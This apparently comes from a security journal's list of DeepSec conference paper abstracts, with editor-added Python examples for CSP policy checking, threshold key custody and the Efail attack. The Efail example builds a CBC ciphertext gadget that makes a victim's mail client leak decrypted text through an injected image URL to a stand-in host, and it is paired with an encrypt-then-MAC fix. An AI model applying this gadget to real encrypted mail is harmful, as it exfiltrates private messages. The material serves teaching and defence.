    Content Security Policy is a web platform mechanism designed to mitigate cross-site scripting (XSS), the top security vulnerability in modern web applications (MITRE, 2014). In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies. We base our Internet-wide analysis on a search engine corpus of approximately 100 billion pages from over 1 billion hostnames; the result covers CSP deployments on 1,680,867 hosts with 26,011 unique CSP policies – the most comprehensive study to date. We introduce the security-relevant aspects of the CSP specification and provide an in-depth analysis of its threat model, focusing on XSS protections. We identify three common classes of CSP bypasses and explain how they subvert the security of a policy. We then turn to a quantitative analysis of policies deployed on the Internet in order to understand their security benefits. We observe that 14 out of the 15 domains most commonly whitelisted for loading scripts contain unsafe endpoints; as a consequence, 75.81% of distinct policies use script whitelists that allow attackers to bypass CSP. In total, we find that 94.68% of policies that attempt to limit script execution are ineffective, and that 99.34% of hosts with CSP use policies that offer no benefit against XSS. Finally, we propose the 'strict-dynamic' keyword, an addition to the specification that facilitates the creation of policies based on cryptographic nonces, without relying on domain whitelists. We discuss our experience deploying such a nonce-based policy in a complex application and provide guidance to web authors for improving their policies.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
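    Added example, not the paper's measurement tooling: a small Python policy checker that applies the policy classes the abstract describes to a Content-Security-Policy string, namely a policy with 'unsafe-inline' and no nonce or hash (ineffective), a host whitelist whose entries are only as safe as the JSONP endpoints and AngularJS copies those hosts serve, and the nonce plus 'strict-dynamic' form the authors propose. The host names in the sample policies are constructed. That browsers which understand 'strict-dynamic' ignore host sources and 'unsafe-inline' once a nonce or hash is present is the specified CSP3 behaviour, which is what makes the recommended policy backward compatible; the object-src and base-uri checks are this editor's additions.

```python
from __future__ import annotations


def parse_csp(policy: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}.
    A repeated directive is ignored by browsers, so the first occurrence wins."""
    directives: dict[str, list[str]] = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def _is_nonce_or_hash(src: str) -> bool:
    return src.strip("'").lower().startswith(("nonce-", "sha256-", "sha384-", "sha512-"))


def _is_host_or_scheme(src: str) -> bool:
    # Anything not quoted is a host, wildcard or scheme source:
    # *, https:, data:, *.cdn.example, https://cdn.example/path ...
    return not src.startswith("'")


def assess_script_policy(policy: str) -> dict:
    """Classify the effective script-src of a policy and list why it may be bypassed."""
    d = parse_csp(policy)
    findings: list[str] = []
    sources = d.get("script-src", d.get("default-src"))
    if sources is None:
        return {"class": "no-script-restriction",
                "findings": ["neither script-src nor default-src is set; scripts are unrestricted"]}

    low = {s.lower() for s in sources}
    has_nonce_hash = any(_is_nonce_or_hash(s) for s in sources)
    hosts = [s for s in sources if _is_host_or_scheme(s)]

    if "'unsafe-inline'" in low and not has_nonce_hash:
        cls = "ineffective"
        findings.append("'unsafe-inline' without a nonce or hash: any injected inline script runs")
    elif has_nonce_hash and "'strict-dynamic'" in low:
        cls = "nonce-based"
        if hosts or "'unsafe-inline'" in low:
            findings.append("host/scheme sources and 'unsafe-inline' are ignored by browsers that "
                            "understand 'strict-dynamic'; they only serve as a fallback for old browsers")
    elif has_nonce_hash and not hosts and "'self'" not in low:
        cls = "nonce-based"
    elif hosts or "'self'" in low:
        cls = "whitelist-based"
        if "'self'" in low:
            findings.append("'self': bypassable if the site itself serves JSONP, AngularJS or user uploads")
        for h in hosts:
            if h == "*" or h.endswith(":") or h.startswith("*."):
                findings.append(f"{h}: broad source, attacker-controlled origins can match")
            else:
                findings.append(f"{h}: bypassable if this origin hosts a JSONP endpoint or AngularJS")
    else:
        cls = "restrictive"  # e.g. script-src 'none'

    # Plugins loaded via <object>/<embed> can execute script as well.
    if "object-src" not in d and "default-src" not in d:
        findings.append("object-src missing (and no default-src): plugin-based script execution not restricted")
    if "base-uri" not in d:
        findings.append("base-uri missing: an injected <base> tag can redirect relative script URLs")
    return {"class": cls, "findings": findings}


# Constructed sample policies, from a typical whitelist to the nonce-based form.
WHITELIST_POLICY = "script-src 'self' https://cdn.example.net; object-src 'none'; base-uri 'none'"
NONCE_POLICY = ("script-src 'nonce-r4nd0m' 'strict-dynamic' 'unsafe-inline' https:; "
                "object-src 'none'; base-uri 'none'")
```

    The nonce in NONCE_POLICY must be fresh per response and unguessable; a fixed string turns the policy back into 'unsafe-inline'. Under 'strict-dynamic' a nonced script may load further scripts without them being whitelisted, which is what lets the policy work in an application that pulls in third-party code at runtime.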
  • Revisiting SOHO Router Attacks
    by Álvaro Folgado Rueda and José Antonio Rodríguez García and Iván Sanz de Castro
    Domestic routers have lately been targeted by cybercrime due to the huge amount of well-known vulnerabilities which compromise their security. The purpose of this paper is to appraise SOHO router security by auditing a sample of these devices and to research innovative attack vectors. More than 60 previously undisclosed security vulnerabilities have been discovered throughout 22 popular home routers, meaning that manufacturers and Internet Service Providers still have much work to do on securing these devices. A wide variety of attacks could be carried out by exploiting the different types of vulnerabilities discovered during this research.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • HVACKer - Bridging the Air-Gap by Manipulating the Environment Temperature
    by Yisroel Mirsky and Mordechai Guri and Yuval Elovici
    Modern corporations physically separate their sensitive computational infrastructure from public or other accessible networks in order to prevent cyber-attacks. However, attackers still manage to infect these networks, either by means of an insider or by infiltrating the supply chain. Therefore, an attacker’s main challenge is to determine a way to command and control the compromised hosts that are isolated from an accessible network (e.g., the Internet).
    In this paper, we propose a new adversarial model that shows how an air-gapped network can receive communications over a covert thermal channel. Concretely, we show how attackers may use a compromised air-conditioning system (connected to the internet) to send commands to infected hosts within an air-gapped network. Since thermal communication protocols are a rather unexplored domain, we propose a novel line encoding and protocol suitable for this type of channel. Moreover, we provide experimental results to demonstrate the covert channel's feasibility, and to calculate the channel's bandwidth. Lastly, we offer a forensic analysis and propose various ways this channel can be detected and prevented. We believe that this study details a previously unseen vector of attack that security experts should be aware of.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Social Engineering - The Most Underestimated APT -- Hacking the Human Operating System
    Dominique C. Brack
    Social Engineering is an accepted APT and is going to stay. Most of the high-value hacking attacks feature components of social engineering. Understanding the methods and approaches used behind the scenes of Social Engineering will help you to make the world a safer place. Or make your attack plans more successful. This article is based on a book I recently wrote about Social Engineering. As a bonus I will present the readers with a free download code for ebook versions (PDF, epub, mobi) of my book for further study.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Cryptographic Enforcement of Segregation of Duty
    Thomas Maus
    Workflows with Segregation-of-Duty requirements or involving multiple parties with non-aligned interests (typically mutually distrustful) pose interesting challenges in often neglected security dimensions.
    Cryptographic approaches are presented to technically enforce strict auditability, traceability and multi-party-authorized access control, and thus also enable exoneration from allegations.
    These ideas are illustrated by challenging examples - constructing various checks and balances for Telecommunications data retention, a vividly discussed and widely known issue.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
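    Added example, not the paper's construction: one standard building block for multi-party-authorized access, Shamir secret sharing, applied to the data-retention scenario the abstract uses. The key that protects retained records is split 2-of-3 among constructed custodians (a judge, the operator's compliance officer and a data-protection officer); no single custodian can reconstruct it, a wrong share is detected against a commitment to the key, and every release attempt is written to a hash-chained log so that later allegations can be checked against the record. Which parties and thresholds are appropriate is a policy question the example does not answer.

```python
from __future__ import annotations
import hashlib
import json
import secrets

PRIME = 2**521 - 1  # Mersenne prime; every 256-bit key is a valid field element


def split_secret(secret: int, threshold: int, shares: int) -> list[tuple[int, int]]:
    """Shamir: evaluate a random degree-(threshold-1) polynomial whose constant
    term is the secret at x = 1..shares."""
    assert 0 <= secret < PRIME and 1 <= threshold <= shares
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]
    out = []
    for x in range(1, shares + 1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation mod PRIME
            y = (y * x + c) % PRIME
        out.append((x, y))
    return out


def reconstruct_secret(shares: list[tuple[int, int]]) -> int:
    """Lagrange interpolation at x = 0; correct only with >= threshold distinct shares."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        total = (total + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return total


def _commit(key: int) -> str:
    return hashlib.sha256(key.to_bytes(66, "big")).hexdigest()


class AuditLog:
    """Hash-chained, append-only record: editing an earlier entry breaks the chain."""

    def __init__(self):
        self.entries: list[dict] = []
        self.head = hashlib.sha256(b"genesis").hexdigest()

    def append(self, event: dict) -> None:
        entry = dict(event, prev=self.head)
        self.head = hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()
        entry["hash"] = self.head
        self.entries.append(entry)

    def verify(self) -> bool:
        prev = hashlib.sha256(b"genesis").hexdigest()
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            if body.get("prev") != prev or digest != entry["hash"]:
                return False
            prev = digest
        return True


class DualControlVault:
    """The retention key is split among custodians; release needs `threshold`
    distinct custodians' shares, is checked against a commitment, and is logged."""

    def __init__(self, key: int, custodians: list[str], threshold: int):
        self.threshold = threshold
        self.commitment = _commit(key)
        self.shares = dict(zip(custodians, split_secret(key, threshold, len(custodians))))
        self.log = AuditLog()

    def release(self, case_id: str, presented: dict[str, tuple[int, int]]) -> int | None:
        names = sorted(presented)  # keyed by custodian, so shares are from distinct parties
        if len(names) < self.threshold:
            self.log.append({"case": case_id, "by": names, "result": "denied"})
            return None
        key = reconstruct_secret([presented[n] for n in names[: self.threshold]])
        if _commit(key) != self.commitment:
            self.log.append({"case": case_id, "by": names, "result": "invalid-shares"})
            return None
        self.log.append({"case": case_id, "by": names, "result": "released"})
        return key


def demo() -> dict:
    key = secrets.randbits(256)  # constructed retention key
    custodians = ["judge", "operator-compliance", "data-protection-officer"]
    vault = DualControlVault(key, custodians, threshold=2)
    alone = vault.release("case-1", {"judge": vault.shares["judge"]})
    joint = vault.release("case-1", {"judge": vault.shares["judge"],
                                     "operator-compliance": vault.shares["operator-compliance"]})
    return {"key": key, "alone": alone, "joint": joint,
            "log_ok": vault.log.verify(), "entries": len(vault.log.entries)}
```

    The commitment check only tells the parties that some presented share was wrong, not which one; verifiable secret sharing would pin that down. The log anchors accountability to the custodians' identities, so in practice each share presentation must itself be authenticated.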

Issue 15, Volume 8, Number 1, 2018

  • What is Information Security? -- Positioning, Opportunities and Risks
    by Dr. Hubert Feyrer
    The special characteristics of information are shown and its value as an asset worth protecting is presented. Information security is explained and related to associated terms. Aspects of implementation leave room for individual decisions to seize opportunities and combat risks. Risk management is a central instrument in this.
    Keywords: security, information security, information, data protection, risk management

Issue 16, Volume 8, Number 2, 2018

  • I Wrote my Own Ransomware; did not make 1 iota of a Bitcoin
    by Thomas Fischer
    2016 saw a substantial rise in ransomware attacks and in some cases the return of some favourites, with Cryptowall, CTB-LOCKER and TeslaCrypt being some of the most popular. The volume of attacks was in fact pretty steady for a good part of the year, with regular campaigns coming out on a weekly basis. It was interesting to see the variety in mechanisms used for the ransomware, which not only included self-contained binaries but went all the way to the use of scripts. As part of the research I conducted last year, I wanted to understand why there's such a drive and lure for ransomware, outside of the victims' payment, as well as have some way of properly testing »anti-ransomware« solutions with an unknown variant. So to do that, I went ahead and built my own ransomware and drew some conclusions on why it became so popular. This talk explores the background and process used to build a live ransomware that I was able to use for controlled testing, and finally draws some of my own personal conclusions.
    Keywords: Malware, Malware Analysis, Bitcoin, Encryption
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Malware Analysis: Machine Learning Approaches
    by Chiheb Chebbi
    Machine learning is obviously the hottest trend in the tech industry at the moment, thanks to the huge amount of data collected in many organizations. It is very powerful for making decisions and predictions based on big data. Fraud detection, natural-language processing, self-driving cars and image recognition are a few examples of machine learning applications. Machine learning is a combination of statistics, computer science, linear algebra, and mathematical optimization methods.
    Keywords: Malware, Machine Learning, Malware Analysis, Deep Learning
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

Issue 17, Volume 9, Number 1, 2019

  • Web Application Firewall Bypassing -- An Approach for Penetration Testers
    by Khalil Bijjou
    Security experts perform security assessments of web applications in order to identify vulnerabilities that could be exploited by malicious users. Web Application Firewalls add a second layer of protection to web applications in order to mitigate these vulnerabilities. The attempt to bypass Web Application Firewalls is an important aspect of a security assessment and is necessary to ensure accurate results. This thesis describes bypass techniques and offers a systematic approach for security experts on how to bypass Web Application Firewalls based on these techniques. In order to facilitate this approach a tool has been developed. The outcomes of this tool have significantly contributed to finding multiple bypasses. These bypasses will be reported to the particular Web Application Firewall vendors and will presumably improve the security level of these Web Application Firewalls.
    Keywords: web application firewalls, penetration testing, bypass techniques, ethical hacking, red team
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • XFLTReaT - Unified Tunneling
    by Balazs Bucsay
    This paper aims to recognize the similarities between existing tunneling solutions and gives advice on a possible framework implementation. The reference implementation can be found on GitHub under the name XFLTReaT. With this framework it is possible to use a single tunneling program with different transport protocols to tunnel data. This approach can help both sides of the IT-security industry to implement new attack and defense scenarios.
    Keywords: Tunnel, Tunneling, Transport Protocol
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Without a Trace - Cybercrime, who are the Defendants?
    by Edith Huber and Bettina Pospisil and Walter Seböck
    Since 2006, cases of computer crime in Austria have been recorded in official crime statistics under the collective term »Cybercrime«. While the authors also analysed the solved cybercrime cases of the last ten years (2006 - 2016), this article focuses on the unsolved cases which occurred during this period. Thus, those cases in which the Vienna Criminal Court did not reach a verdict are analysed through a file analysis conducted by an interdisciplinary team. The aim of the article is to gain more insight into the phenomenon of cybercrime. Special focus lies on the actors of cybercrime (offenders and victims) as well as the heterogeneous approaches and motivations of offenders.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

Issue 18, Volume 9, Number 2, 2019

  • New Attack Vectors for Mobile Core Networks
    by Silke Holtmanns
    Mobile network operators connect towards each other through the private interconnection network (IPX). This closed private network enables international calls, data, messages and many other services across network and country borders. It connects billions of users and Internet of Things devices. In the last years, evidence arose that the network has been misused for various kinds of attacks. We will introduce the foundations of the interconnection network, give the security background, outline existing attacks and describe a new charging attack. Various activities are ongoing to improve the security of the IPX network, which we will describe. We close with an overview of potential risk areas for 5G core networks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Efail and other Failures with Encryption and E-Mail -- Outdated Crypto Standards and HTML Mails as a Security Risk
    by Hanno Böck
    The Efail bug against encrypted e-mails showed a variety of problems with the interaction of outdated cryptography and HTML e-mails. This talk will give an overview of the flaws that led to Efail and some other fun attacks that followed it. 
    Efail is an attack against E-Mail encryption with both S/MIME and OpenPGP. It often allows attackers, able to observe the encrypted message, to construct modified messages that will send the encrypted content back to the attacker. When Efail was published earlier this year only incomplete fixes were available. For S/MIME the issue is still completely unfixed and it's likely to stay that way. 
    Efail combines two weaknesses: Both E-Mail encryption standards use outdated cryptography, particularly they don't use proper authenticated encryption. This allows attackers to modify transmitted messages. HTML mails give the sender of a mail a huge amount of control over what happens when rendering a mail. This can be abused in a variety of ways to send decrypted e-mail content to the attacker. After the first incomplete fixes for Efail the speaker was able to bypass the implemented fixes in Enigmail multiple times. The talk will go over the basics of Efail, discuss attacks and variations that followed it, and discuss some further attacks including SigSpoof and two yet undisclosed attacks.
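    Added example, not from the talk: the CBC malleability at the core of the Efail gadget, shown in Python with a toy Feistel block cipher standing in for AES (the property depends only on CBC chaining, not on the cipher, and the standard library has no AES). The attacker knows the plaintext of the first block (Efail uses the predictable MIME header) and, without the key, rewrites the ciphertext so that the victim's client decrypts an attacker-chosen <img src="...> prefix, the original message and a closing quote; a client that renders HTML then fetches the plaintext as a URL. The message, key and IV are constructed. The encrypt-then-MAC functions at the end show how an authentication tag over the ciphertext makes the same modification fail.

```python
from __future__ import annotations
import hashlib
import hmac

BLOCK = 16
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 128-bit Feistel cipher: a stand-in for AES, not a real cipher."""
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, i, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    assert len(plaintext) % BLOCK == 0
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Unauthenticated CBC: P_i = D(C_i) xor C_{i-1}, nothing checks C_{i-1}."""
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))
        prev = cur
    return b"".join(out)


def efail_cbc_gadget(iv: bytes, ciphertext: bytes, known_p1: bytes,
                     chosen_head: bytes, chosen_tail: bytes) -> tuple[bytes, bytes]:
    """Attacker side, no key needed. Because D(C1) = P1 xor IV, placing
    X = IV xor P1 xor chosen in front of C1 makes C1 decrypt to `chosen`.
    Returned chain decrypts to: chosen_head | garbage | plaintext | garbage | chosen_tail."""
    c1 = ciphertext[:BLOCK]
    x_head = _xor(_xor(iv, known_p1), chosen_head)
    x_tail = _xor(_xor(iv, known_p1), chosen_tail)
    # new IV = X_head; blocks: C1, IV, C1, C2, ..., Cn, X_tail, C1
    return x_head, c1 + iv + ciphertext + x_tail + c1


def rendered_exfil_url(decrypted: bytes) -> bytes | None:
    """What an HTML mail client does with the injected <img>: it requests
    everything between src=" and the next double quote."""
    start = decrypted.find(b'src="')
    if start < 0:
        return None
    start += len(b'src="')
    end = decrypted.find(b'"', start)
    return decrypted[start:end] if end >= 0 else None


def encrypt_then_mac(enc_key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes):
    """Hardened form: a MAC over IV and ciphertext detects any modification."""
    ct = cbc_encrypt(enc_key, iv, plaintext)
    return ct, hmac.new(mac_key, iv + ct, hashlib.sha256).digest()


def verify_then_decrypt(enc_key: bytes, mac_key: bytes, iv: bytes, ct: bytes, tag: bytes):
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # reject before decrypting anything
    return cbc_decrypt(enc_key, iv, ct)


# Constructed demo values: a MIME-like message with a predictable first block.
KEY = b"constructed-demo-key"
IV = bytes(range(16))
_MSG = b"Content-Type: te" + b"xt/plain\r\n\r\nSecret: launch code 4242"
PLAINTEXT = _MSG + b" " * (-len(_MSG) % BLOCK)
CHOSEN_HEAD = b'<img src="//a.x/'   # exactly one block
CHOSEN_TAIL = b'">' + b" " * 14      # exactly one block


def demo() -> dict:
    ct = cbc_encrypt(KEY, IV, PLAINTEXT)
    iv2, ct2 = efail_cbc_gadget(IV, ct, PLAINTEXT[:BLOCK], CHOSEN_HEAD, CHOSEN_TAIL)
    leaked = cbc_decrypt(KEY, iv2, ct2)  # what the victim's client sees
    return {"decrypted": leaked, "url": rendered_exfil_url(leaked)}
```

    The two garbage blocks are D(IV) xor C1 and D(X_tail) xor Cn; the attacker cannot control them, and if one happens to contain a double quote the URL is cut short, which is why the real attack tries several gadget placements. The fix the abstract points to is exactly verify_then_decrypt: with an authentication tag the modified chain is rejected before any plaintext reaches the HTML renderer.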
  • Defense Informs Offense Improves Defense -- How to Compromise an Industrial Control Systems Network – and How to Defend it
    Joseph Slowik
    ICS attacks have an aura of sophistication, high barriers to entry, and significant investment in time and resources. When looking at the situation from a defender's perspective, nothing could be further from the truth. Attacking and potentially taking down an ICS network requires - and probably operates best - via permutations of pen tester 101 actions combined with some knowledge of the environment and living off the land.  In this paper, we will explore some concrete ICS attack examples to explore just what is needed to breach and impact this environment. More importantly, using malware and data captured from recent attacks - specifically TRISIS and CRASHOVERRIDE - we'll see how the attackers messed up their attacks and why a more simplified and direct approach to achieving offensive goals would not only be more effective, but likely far more difficult for defenders to catch as well. To close the conversation, we'll explore what defensive measures can be applied - and are necessary - to detect and stop such attacks in their tracks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Drones, the New Threat from the Sky
    Dominique C. Brack
    This paper is about drones: drone risks and countermeasures. Drones have become an inherent risk not just for critical infrastructure but also for public events (sports, concerts) and privacy. I wrote about the exclusive risk catalogue I have developed for a small, highly specialised startup called DroneGuard. The catalogue contains over 140 detailed drone-related risks, from the payload of drones (explosives, chemicals, etc.) to cyber risks like Signal Hacking and Disruption (WiFi, GSM, Bluetooth, RFID, etc.). Since DeepSec is a more technically oriented event I will highlight the risk management framework, my experience with our personal payload drone and the cyber risks. This talk will help you if you have to protect critical infrastructure from a physical perspective, or if you have to protect yourself or your company from privacy implications.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • BitCracker: BitLocker meets GPUs
    Elena Agostini and Massimo Bernaschi
    BitLocker is a full-disk encryption feature available in recent Windows versions. It is designed to protect data by providing encryption for entire volumes and it makes use of a number of different authentication methods. In this work we present a solution, named BitCracker, to attempt the decryption, by means of a dictionary attack, of memory units encrypted by BitLocker with a user-supplied password. To that purpose, we resort to GPUs (Graphics Processing Units), which are by now widely used as general-purpose coprocessors in high performance computing applications. The BitLocker decryption process requires the execution of a very large number of SHA-256 hashes and also AES, so we propose a very fast solution, highly tuned for Nvidia GPUs, for both of them. In addition we take advantage of a weakness in the BitLocker decryption algorithm to speed up the execution of our attack. We benchmark our solution using the three most recent Nvidia GPU architectures (Kepler, Maxwell and Pascal), carrying out a comparison with the Hashcat password cracker. Finally, our OpenCL implementation of BitCracker has recently been released within John The Ripper, Bleeding-Jumbo version.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

Issue 19, Volume 10, Number 1, 2020

  • Building Your Own Web Application Firewall as a Service -- And Forgetting about False Positives
    by Juan Berner
    When a Web Application Firewall (WAF) is presented as a defensive solution to web application attacks, there is usually a decision to be made: Will the solution be placed inline (and risk affecting users due to outages or latency) or will it be placed out of band (not affecting users but not protecting them either). This paper will cover a different approach you can take when deciding how to use any WAF at your disposal, which is to try and get the best of both worlds, making the WAF work in passive mode out of band detecting attacks and in active mode by selectively routing traffic through your WAF to decide if it should block the request or allow it.
    To achieve this the paper will show how to abstract the WAF around a web service, something that developers are commonly used to working with, which can result in delivering security in a targeted and scalable manner. In this network agnostic setup, a WAF web service functionality can grow horizontally, allowing you to enhance the WAF decisions with your own business knowledge. This will mean that the decision to block or to route traffic through the WAF will not only depend on the WAF’s decision but also on data about your application and its context, which can significantly reduce the false positive rate up to the point of practically not existing.
    This paper will go through how such a service can be built with open source examples, what alternatives there are, depending on the flexibility of the WAF used, and how this approach can be used to manually decide on the false positive rate wanted and the desired business risk depending on the attack type and its possible impact.
    Keywords: WAF, Web Application Firewall, Security Architecture, Web Application
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

Issue 20, Volume 10, Number 2, 2020

  • Implementing Information Security in Utility Companies -- Some Practical Experiences
    by Stefan Schumacher
    As operators of critical infrastructure, utility companies are exposed to a wide variety of attacks from the Internet. Simple office computers, billing systems and industrial control systems alike are regularly attacked by various actors, including untargeted automated mass attacks.
    The contribution shows how you can protect your infrastructure against attacks, how to proceed strategically to do so, and which technical and organisational measures should be implemented. Furthermore, standards and guidelines such as ISO 27001 or the BSI IT-Grundschutz approach are presented in an overview.